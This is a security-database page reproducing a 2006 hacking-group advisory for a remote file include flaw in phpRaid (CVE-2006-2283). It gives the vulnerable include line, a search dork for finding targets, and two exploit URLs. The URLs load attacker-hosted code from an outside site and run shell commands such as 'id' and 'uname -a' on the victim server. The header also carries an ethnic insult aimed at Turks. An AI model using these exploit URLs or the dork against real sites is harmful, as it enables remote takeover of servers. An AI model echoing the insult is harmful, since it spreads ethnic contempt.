Bug: phpRaid Remote File Include [SMF] ( Ascii Version )

Search:
WLB2

phpRaid Remote File Include [SMF]

Published
Credit
Risk
2006.05.10
botan linuxmail org
High
CWE
CVE
Local
Remote
N/A
CVE-2006-2283
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# Kurdish Security Advisory

# phpRaid Remote File Include [SMF] :}

# "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan

# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan (at) linuxmail (dot) org [email
concealed]

# Risk : High

# Class : Remote

# Script : phpRaid

# Script Website : http://www.spiffyjr.com

# Version : phpRaid v2.9.5

" v3.0.b1

" v3.0.b2

" v3.0.b3

# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D

# Special Bastard : Turkish Lame

# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)

---------------------------------------------------------------------

# cmd shell example:

# cmd shell variable: ($_GET[cmd]);

Vulnerable code : Now SMF portal code :)

// includes

include($smf_root_path= . 'SSI.php');

-----------------------------------------------------------------------

http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www
.yourcode.com/x.txt?&cmd=id

http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www
.yourcode.com/x.txt?&cmd=uname -a

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version